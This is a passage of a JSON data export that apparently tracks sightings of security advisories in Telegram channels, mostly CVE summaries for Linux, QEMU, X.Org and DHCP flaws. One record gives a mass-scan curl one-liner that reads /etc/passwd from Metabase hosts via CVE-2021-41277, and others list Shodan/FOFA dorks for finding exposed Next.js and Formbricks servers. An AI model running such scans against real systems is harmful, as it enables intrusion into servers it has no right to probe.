{"uuid": "746706a6-8b0a-4dc9-96a2-0ae542ef5a19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R3W-4J8Q-PW98", "type": "published-proof-of-concept", "source": "Telegram/rLKCH5UMyA6F-Z6d5BZHqsI3KF4VWjnDtolwppvitA45OA", "content": "", "creation_timestamp": "2025-12-08T18:48:33.000000Z"}, {"uuid": "44708c8f-a16c-4f78-9e13-894f8a10130f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1248", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "0972173e-5a42-4420-a5d1-7ea888e58c84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2094", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "818f5b55-6f5d-4820-b321-c6059cf787a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0881", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "9b189f59-e61e-402b-b85c-eb0ae9c13918", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0724", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "a5a9330c-f6cb-4f1d-a45d-9f4f16e8e5f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VJ4-RV7Q-36QJ", "type": "seen", "source": "Telegram/61p3TvgIcQeITUHd25WC7uXKnalG822tf2zquntb02gfO4o", "content": "", "creation_timestamp": "2025-06-24T03:34:31.000000Z"}, {"uuid": "6b118b0b-8470-457b-b81b-5311b12ac6a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9QR9-H5GF-34MP", "type": "published-proof-of-concept", "source": "https://t.me/notlukatsky/7887", "content": "RCE \u0432 React, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0443\u0435\u0442 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u044b \u0441\u0430\u0439\u0442\u043e\u0432. \u0412\u0435\u0440\u0438\u043c?\n\nhttps://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components\nhttps://github.com/advisories/GHSA-9qr9-h5gf-34mp\n\n\u041f\u043e\u0448\u0451\u043b \u0441\u0435\u0440\u0447\u0438\u0442\u044c PoC, \u0430 \u0432\u0430\u043c \u0441\u043f\u043e\u043a\u043e\u0439\u043d\u043e\u0439 \u043d\u043e\u0447\u0438))", "creation_timestamp": "2025-12-03T21:25:35.000000Z"}, {"uuid": "4d4b8e3b-7e4c-4638-99ec-f08c97f915e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JQ9-2XHW-JPX7", "type": "published-proof-of-concept", "source": "https://t.me/AnonGhostIndonesiaforum/128", "content": "CVE-2023-5072: High Severity DoS Vulnerability in JSON-JAVA\n\nMitigation: Update JSON-java to the latest version, 20231013.\n\n\n\nhttps://github.com/google/security-research/security/advisories/GHSA-4jq9-2xhw-jpx7", "creation_timestamp": "2023-11-26T20:59:17.000000Z"}, {"uuid": "7eced441-7493-47af-b257-efc07ad7195b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G3CP-PQ72-HJPV", "type": "published-proof-of-concept", "source": "Telegram/M9-i1Qbwyyn770GCmB3fqZ1mKxD49UUhLWasJxz0nGyZyTc", "content": "", "creation_timestamp": "2025-06-12T19:34:25.000000Z"}, {"uuid": "27926ce7-4d9b-42ec-8799-353c770273d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2V3V-3WHP-953H", "type": "published-proof-of-concept", "source": "Telegram/M9-i1Qbwyyn770GCmB3fqZ1mKxD49UUhLWasJxz0nGyZyTc", "content": "", "creation_timestamp": "2025-06-12T19:34:25.000000Z"}, {"uuid": "256e2a90-5327-48db-8eef-38921e4ede0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JP4X-W9CJ-97Q7", "type": "seen", "source": "Telegram/4Ga2KnPxVC8teo9C6h_WW8v7cz1iZaC5NGvXAx1RBKflQoQ", "content": "", "creation_timestamp": "2025-06-13T19:03:31.000000Z"}, {"uuid": "0ddadccf-84cf-405a-ac2b-ed4a56e6abe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59W6-R9HM-439H", "type": "seen", "source": "Telegram/4Ga2KnPxVC8teo9C6h_WW8v7cz1iZaC5NGvXAx1RBKflQoQ", "content": "", "creation_timestamp": "2025-06-13T19:03:31.000000Z"}, {"uuid": "9f6046d5-c935-479f-93f0-e5c8cdd9db3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6M38-4R9R-5C4M", "type": "seen", "source": "Telegram/T9EREMrZJ40Ll1HhU5KoHVoW6Lc4lkfgV3T7v7c_6jHizrY", "content": "", "creation_timestamp": "2025-06-18T16:32:08.000000Z"}, {"uuid": "8428bd03-86cd-4b40-bad7-501c769e8874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JWR7-992G-68MH", "type": "published-proof-of-concept", "source": "Telegram/M9-i1Qbwyyn770GCmB3fqZ1mKxD49UUhLWasJxz0nGyZyTc", "content": "", "creation_timestamp": "2025-06-12T19:34:25.000000Z"}, {"uuid": "8898bbfc-9685-4545-8603-21834f110eb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4492", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15070", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3567\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in QEMU. An assertion failure was present in the update_sctp_checksum() function in hw/net/net_tx_pkt.c when trying to calculate the checksum of a short-sized fragmented packet. This flaw allows a malicious guest to crash QEMU and cause a denial of service condition.\n\ud83d\udccf Published: 2024-04-10T14:32:02.343Z\n\ud83d\udccf Modified: 2025-05-06T08:11:33.546Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4492\n2. https://access.redhat.com/security/cve/CVE-2024-3567\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2274339\n4. https://gitlab.com/qemu-project/qemu/-/issues/2273", "creation_timestamp": "2025-05-06T08:20:25.000000Z"}, {"uuid": "8cacb70e-9270-481c-a956-19e6bc432dc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C2H-67QQ-VM87", "type": "seen", "source": "Telegram/pmCQczjONs0GfJ4fUtzY9Rs7uNvrLwRQOu1OBXv_D7CpRkk", "content": "", "creation_timestamp": "2025-06-12T19:34:31.000000Z"}, {"uuid": "13d6aee4-883a-4948-9f42-f839e9e206a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86XF-2MGP-GV3G", "type": "seen", "source": "Telegram/pmCQczjONs0GfJ4fUtzY9Rs7uNvrLwRQOu1OBXv_D7CpRkk", "content": "", "creation_timestamp": "2025-06-12T19:34:31.000000Z"}, {"uuid": "426f979f-99dc-4a75-b88b-a955090a11a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MVP5-QX9C-C3FV", "type": "published-proof-of-concept", "source": "Telegram/BdAJvjHyhFMVsKfZl02ptmuMNqjhviASPolesySVDo2DxO4", "content": "", "creation_timestamp": "2025-06-13T18:01:53.000000Z"}, {"uuid": "4899048b-9161-490c-ac2a-a739d4afb69e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W73V-6P7P-FPFR", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8206", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day | CVE-2021-41277\n\ncat targets.txt | while read host do;do curl --silent --insecure --path-as-is \"$host/api/geojson?url=file:///etc/passwd\" | grep -qs \"root:x\" &amp;&amp; echo \"$host \\033[0;31m Vulnerable\";done\n\nhttps://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr", "creation_timestamp": "2021-11-24T19:33:37.000000Z"}, {"uuid": "1fdb7a6c-3ec8-45b5-8832-e63a45d49ca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3C9-CMH8-7QPJ", "type": "published-proof-of-concept", "source": "https://t.me/DEVIL_TEAM11/353", "content": "\u200f\ud83d\uded1 \u062a\u062d\u0630\u064a\u0631 \u0623\u0645\u0646\u064a \ud83d\uded1\n\n\u062b\u063a\u0631\u0629 \u062d\u0631\u062c\u0629 \u0641\u064a NextCloud  CVE-2023-26482 \u0635\u0646\u0641\u062a \u0628\u0627\u0644\u062f\u0631\u062c\u0629 9 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0639\u0627\u062f\u064a \u0628\u0625\u0646\u0634\u0627\u0621 workflows \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u062f\u064a\u0631 \u0627\u0644\u0646\u0638\u0627\u0645 .\n\nhttps://github.com/nextcloud/security-advisories/security/advisories/GHSA-h3c9-cmh8-7qpj", "creation_timestamp": "2023-04-05T22:05:51.000000Z"}, {"uuid": "aec02421-8a51-4486-b4fd-60e5cb2bbd3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:0469", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13561", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2018-5733\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -&gt; 4.1-ESV-R15, 4.2.0 -&gt; 4.2.8, 4.3.0 -&gt; 4.3.6, 4.4.0.\n\ud83d\udccf Published: 2019-01-16T20:00:00.000Z\n\ud83d\udccf Modified: 2025-04-25T23:02:52.084Z\n\ud83d\udd17 References:\n1. https://kb.isc.org/docs/aa-01567\n2. https://access.redhat.com/errata/RHSA-2018:0469\n3. https://www.debian.org/security/2018/dsa-4133\n4. https://usn.ubuntu.com/3586-2/\n5. https://access.redhat.com/errata/RHSA-2018:0483\n6. https://usn.ubuntu.com/3586-1/\n7. http://www.securityfocus.com/bid/103188\n8. http://www.securitytracker.com/id/1040437\n9. https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html", "creation_timestamp": "2025-04-26T00:07:37.000000Z"}, {"uuid": "f1009401-a5b2-451a-8925-27973834ab92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:0483", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13561", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2018-5733\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -&gt; 4.1-ESV-R15, 4.2.0 -&gt; 4.2.8, 4.3.0 -&gt; 4.3.6, 4.4.0.\n\ud83d\udccf Published: 2019-01-16T20:00:00.000Z\n\ud83d\udccf Modified: 2025-04-25T23:02:52.084Z\n\ud83d\udd17 References:\n1. https://kb.isc.org/docs/aa-01567\n2. https://access.redhat.com/errata/RHSA-2018:0469\n3. https://www.debian.org/security/2018/dsa-4133\n4. https://usn.ubuntu.com/3586-2/\n5. https://access.redhat.com/errata/RHSA-2018:0483\n6. https://usn.ubuntu.com/3586-1/\n7. http://www.securityfocus.com/bid/103188\n8. http://www.securitytracker.com/id/1040437\n9. https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html", "creation_timestamp": "2025-04-26T00:07:37.000000Z"}, {"uuid": "888a9370-007c-44c7-9717-7ef225f5e870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4742-MR57-2R9J", "type": "seen", "source": "https://t.me/securixy_kz/1275", "content": "", "creation_timestamp": "2026-07-12T22:00:06.556598Z"}, {"uuid": "822757af-dd96-4238-85ea-75ac1eaf956d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4CX5-89VM-833X", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9255", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aGHSA-4cx5-89vm-833x/CVE-2024-52800\nURL\uff1ahttps://github.com/JAckLosingHeart/GHSA-4cx5-89vm-833x-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-30T06:58:11.000000Z"}, {"uuid": "4d0eb0a1-8bb5-48f7-b6d3-62184414ba50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "328e22a1-aa6d-4f02-8b80-ac960a8eadc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "1831a316-9a3e-497a-81b9-45c2aecec444", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QX2M-RCPC-V43V", "type": "seen", "source": "https://t.me/cKure/14700", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 \ud83d\udce6 Oracle VM VirtualBox - VM Escape via VGA device.\n\nhttps://github.com/google/security-research/security/advisories/GHSA-qx2m-rcpc-v43v", "creation_timestamp": "2025-05-21T13:45:45.000000Z"}, {"uuid": "4bb3488a-4ffa-4e3e-b453-a6d1deeeaf80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7229-Q9PV-J6P4", "type": "published-proof-of-concept", "source": "https://t.me/cKure/15460", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 \ud83d\udd25CVE-2025-59934: Critical Flaw in Formbricks Allows Unauthorized\nPassword Resets via Forged JWT Tokens\n\n\ud83d\ude80POC -https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4\n\nDorks: http://product.name=\"Formbricks\"", "creation_timestamp": "2025-09-28T09:16:19.000000Z"}, {"uuid": "b372259f-a487-4f96-baf6-23952dc9131e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-637G-8V47-79MV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13580", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46652\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: In IZArc through 4.5, there is a Mark-of-the-Web Bypass Vulnerability. When a user performs an extraction from an archive file that bears Mark-of-the-Web, Mark-of-the-Web is not propagated to the extracted files.\n\ud83d\udccf Published: 2025-04-26T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-26T17:53:03.829Z\n\ud83d\udd17 References:\n1. https://github.com/EnisAksu/Argonis/blob/main/CVEs/IZArc/IZArc%20Mark-of-the-Web%20Bypass%20Vulnerability.md\n2. https://github.com/EnisAksu/Argonis/security/advisories/GHSA-637g-8v47-79mv\n3. https://www.izarc.org/news", "creation_timestamp": "2025-04-26T18:08:56.000000Z"}, {"uuid": "9c88f825-bd41-43e3-b134-e625f734302f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/hackingbra/126", "content": "\ud83d\udea8Alert\ud83d\udea8CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions\n\ud83d\udd25PoC: https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps#/ \n\u26a0A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.\n\ud83d\udcca3.1M+ Services are found on  hunter.how\n\ud83d\udd17Hunter Link: https://hunter.how/list?searchValue=product.name%3D%22Next.js%22 \n\ud83d\udcf0Refer: https://github.com/advisories/GHSA-fr5h-rqp8-mj6g \nHunter:/product.name=\"Next.js\"\nFOFA:app=\"Next.js\"\nSHODAN:http.component:\"Next.js\"", "creation_timestamp": "2024-05-10T12:42:38.000000Z"}, {"uuid": "3e921b21-7212-415d-85c7-68722744fd76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JHW-6PJJ-8723", "type": "seen", "source": "https://t.me/cvedetector/18841", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-27143 - Better Auth Open Redirect Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-27143 \nPublished : Feb. 24, 2025, 11:15 p.m. | 1\u00a0hour, 54\u00a0minutes ago \nDescription : Better Auth is an authentication and authorization library for TypeScript. Prior to version 1.1.21, the application is vulnerable to an open redirect due to improper validation of the callbackURL parameter in the email verification endpoint and any other endpoint that accepts callback url. While the server blocks fully qualified URLs, it incorrectly allows scheme-less URLs. This results in the browser interpreting the URL as a fully qualified URL, leading to unintended redirection. An attacker can exploit this flaw by crafting a malicious verification link and tricking users into clicking it. Upon successful email verification, the user will be automatically redirected to the attacker's website, which can be used for phishing, malware distribution, or stealing sensitive authentication tokens. This CVE is a bypass of the fix for GHSA-8jhw-6pjj-8723/CVE-2024-56734. Version 1.1.21 contains an updated patch. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"25 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-25T02:19:27.000000Z"}, {"uuid": "92ec79eb-27a8-450a-99ca-b2dd234cee5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C8HM-HR8H-5XJW", "type": "published-proof-of-concept", "source": 